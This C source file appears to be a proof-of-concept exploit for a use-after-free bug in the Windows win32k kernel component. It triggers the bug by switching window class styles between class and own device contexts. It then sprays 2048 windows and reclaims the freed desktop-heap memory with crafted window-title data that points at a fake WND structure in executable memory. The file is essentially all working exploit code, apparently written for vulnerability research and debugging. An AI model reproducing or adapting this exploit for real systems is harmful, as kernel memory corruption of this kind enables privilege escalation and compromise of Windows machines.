#include <windows.h>
#include <stdio.h>
#include <assert.h>

#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
#pragma pack(1)

// These structure definitions are mostly from ReactOS. https://www.reactos.org/wiki/Techwiki:Win32k/WND
typedef struct _HEAD {
    HANDLE h;
    DWORD  cLockObj;
} HEAD, *PHEAD;

typedef struct _THROBJHEAD {
    HEAD;
    PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;

typedef struct _THRDESKHEAD {
    THROBJHEAD;
    PVOID    rpdesk;
    PVOID    pSelf;
} THRDESKHEAD, *PTHRDESKHEAD;

// How many times to attempt to acquire the freed buffer.
static SIZE_T kNumSprayWnds = 2048;

// The size of this structure must match the size in win32k, add padding as necessary.
// You can verify the size against the parameters to HMAllocObject() in win32kfull!xxxCreateWindowEx.
#define EXPECTED_WND_SIZE 240

typedef struct _WND WND, *PWND;

struct _WND {
    THRDESKHEAD head;
    struct {
        DWORD Pad[7];
        WORD  hmod16;
        WORD  fnid;
    } WW;
    PWND spwndPrev;
    PWND spwndNext;
    PWND spwndParent;
    PWND spwndChild;
    PWND spwndOwner;
    BYTE Padding[0xa8];
};

DWORD CALLBACK TriggerVuln(PVOID Params)
{
    WNDCLASSEX WindowClass = {0};
    ATOM Atom;
    HDC  Context;
    HWND WindowA, WindowB, WindowC;

    WindowClass.cbSize         = sizeof(WNDCLASSEX);
    WindowClass.lpfnWndProc    = DefWindowProc;
    WindowClass.lpszClassName  = "Thread";

    Atom = RegisterClassEx(&WindowClass);

    WindowA = CreateWindowEx(0, MAKEINTATOM(Atom), "One", 0, CW_USEDEFAULT, 0, 0, 0, NULL, NULL, NULL, NULL);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC);
    WindowB = CreateWindowEx(0, MAKEINTATOM(Atom), "Two", 0, CW_USEDEFAULT, 0, 0, 0, NULL, NULL, NULL, NULL);
    Context = GetDC(WindowA);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC | CS_OWNDC);
    WindowC = CreateWindowEx(0, MAKEINTATOM(Atom), "Three", 0, CW_USEDEFAULT, 0, 0, 0, NULL, NULL, NULL, NULL);
    ReleaseDC(WindowA, Context);
    return 0;
}

VOID DebugPrint(PCHAR Prefix, PCHAR Format, ...)
{
    va_list ap;
    fprintf(stderr, "%s", Prefix);
    fprintf(stderr, " ");
    va_start(ap, Format);
        vfprintf(stderr, Format, ap);
    va_end(ap);
    fprintf(stderr, "\n");
    fflush(stderr);
    return;
}

// Try to pick an address that is easy to set in SetWindowTextW(), i.e. it
// should be at something like 0x00410041.
PWND AllocateFakeWnd(VOID)
{
    DWORD AddrChar;

    DebugPrint("[*]", "Attempting to find good fake WND location...");

    for (AddrChar = 'A'; AddrChar < 'Z'; AddrChar++) {
        if (VirtualAlloc((PVOID)(AddrChar << 16),
                         0x10000,
                         MEM_COMMIT | MEM_RESERVE,
                         PAGE_EXECUTE_READWRITE)) {
            DebugPrint("[*]", "Success, FakeWnd@%p", (PVOID)(AddrChar << 16 | AddrChar));
            return (PVOID)(AddrChar << 16 | AddrChar);
        }
        DebugPrint("[!]", "VirtualAlloc(%p) failed, %#x. Trying next candidate...", (PVOID)(AddrChar << 16), GetLastError());
    }

    DebugPrint("[!]", "Failed to create WND structure.");
    DebugPrint("[*]", "We probably got unlucky with ASLR, just try again.");
    ExitProcess(1);
}

int main(int argc, char **argv) {
    HANDLE Thread;
    WCHAR AddrChar;
    PWND TitleText;
    WNDCLASSEX WindowClass = {0};
    HWND *Spray;
    ATOM Atom;
    PWND FakeWnd;

    WindowClass.cbSize         = sizeof(WNDCLASSEX);
    WindowClass.lpfnWndProc    = DefWindowProc;
    WindowClass.lpszClassName  = "Parent";
    TitleText                  = _alloca(sizeof(WND));
    Spray                      = _alloca(kNumSprayWnds * sizeof(HWND));
    FakeWnd                    = AllocateFakeWnd();

    assert(FakeWnd);
    assert(sizeof(WND) == EXPECTED_WND_SIZE);

    // Just some recognizable junk I can look for in kd.
    FillMemory(FakeWnd, sizeof(WND), 'F');

    Atom = RegisterClassEx(&WindowClass);

    ZeroMemory(Spray, kNumSprayWnds * sizeof(HWND));

    // Make sure the string is NUL terminated.
    ZeroMemory(TitleText, sizeof(WND));

    // Fill with valid-ish characters.
    FillMemory(TitleText, sizeof(WND) - sizeof(WCHAR), '?');

    // Fill in fields we're interested in.
    TitleText->spwndPrev = 'AAAA';
    TitleText->spwndNext = 'BBBB';
    TitleText->spwndParent = FakeWnd;
    TitleText->spwndChild = 'DDDD';
    TitleText->spwndOwner = 'EEEE';

    FakeWnd->spwndParent = 0xDEADBEEF;

    for (UINT i = 0; i < kNumSprayWnds; i++) {
        Spray[i] = CreateWindowEx(0, MAKEINTATOM(Atom), "Spray", 0, CW_USEDEFAULT, 0, 0, 0, NULL, NULL, NULL, NULL);
    }

    DebugPrint("[*]", "%u HWNDs created for spamming %#x-sized desktop heap allocations", kNumSprayWnds, sizeof(WND));

    // Let the heap settle down.
    Sleep(1000);

    if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL)) {
        DebugPrint("[*]", "SetThreadPriority() successful");
    } else {
        return 1;
    }

    Thread = CreateThread(NULL, 0, TriggerVuln, NULL, 0, NULL);

    WaitForSingleObject(Thread, INFINITE);

    // Now the dce list should have bad WND pointers in it, can we get them allocated quickly?
    for (UINT i = 0; i < kNumSprayWnds; i++) {
        SetWindowTextW(Spray[i], (PVOID) TitleText);
    }

    while (TRUE) {
        // I experimented with a few sequences to cause the list to be
        // traversed, this seems to work reliably for testing.
        HWND Traverse = CreateWindowEx(0, MAKEINTATOM(Atom), "Traverse", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
        ShowWindow(Traverse, SW_SHOW);
        PostMessage(Traverse, WM_QUIT, 0, 0);
    }

    CloseHandle(Thread);
    return 1;
}
